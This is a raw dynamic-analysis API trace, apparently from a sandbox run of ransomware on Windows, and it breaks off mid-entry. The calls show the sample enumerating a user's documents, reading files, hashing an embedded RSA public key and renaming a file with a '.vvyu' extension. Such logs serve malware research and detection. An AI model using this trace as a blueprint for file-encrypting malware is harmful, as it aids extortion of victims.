WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.769] WriteFile (in: hFile=0x574, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.769] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.769] WriteFile (in: hFile=0x574, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.769] CloseHandle (hObject=0x574) returned 1 [0194.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d2cc80 [0194.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0194.773] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\s oMD9qxXFL8rvNP.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\s omd9qxxfl8rvnp.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\s oMD9qxXFL8rvNP.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\s omd9qxxfl8rvnp.rtf.vvyu")) returned 1 [0194.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.775] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.778] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274d38a0, ftCreationTime.dwHighDateTime=0x1d89cdc, ftLastAccessTime.dwLowDateTime=0xfff20b90, ftLastAccessTime.dwHighDateTime=0x1d8a1cd, ftLastWriteTime.dwLowDateTime=0xfff20b90, ftLastWriteTime.dwHighDateTime=0x1d8a1cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TawX51muD", cAlternateFileName="TAWX51~1")) returned 1 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6d8b40 [0194.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0194.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c16398 | out: hHeap=0x6a0000) returned 1 [0194.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7599e8 | out: hHeap=0x6a0000) returned 1 [0194.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0194.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.781] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40871210, ftCreationTime.dwHighDateTime=0x1d89da8, ftLastAccessTime.dwLowDateTime=0xf37ea420, ftLastAccessTime.dwHighDateTime=0x1d89dc9, ftLastWriteTime.dwLowDateTime=0xf37ea420, ftLastWriteTime.dwHighDateTime=0x1d89dc9, nFileSizeHigh=0x0, nFileSizeLow=0x4dff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XiVbHKfo h.ppt", cAlternateFileName="XIVBHK~1.PPT")) returned 1 [0194.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2eca8 [0194.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0194.781] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\XiVbHKfo h.ppt") returned=".ppt" [0194.781] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\XiVbHKfo h.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\xivbhkfo h.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0194.782] GetFileSizeEx (in: hFile=0x574, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=19967) returned 1 [0194.782] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.785] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x4dd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.785] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.787] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.787] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x4dff, lpOverlapped=0x0) returned 1 [0194.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.788] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0194.789] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.789] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.789] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.789] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.789] GetLastError () returned 0x0 [0194.789] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0194.789] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0194.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.790] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.790] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.790] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e00) returned 0x2d49778 [0194.790] SetFilePointer (in: hFile=0x574, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d424f0 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42538 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.791] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a090 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0194.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.794] GetCurrentThreadId () returned 0x264 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46630 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.795] GetCurrentThreadId () returned 0x264 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0194.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a108 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0194.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a120 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.801] HeapFree (in: 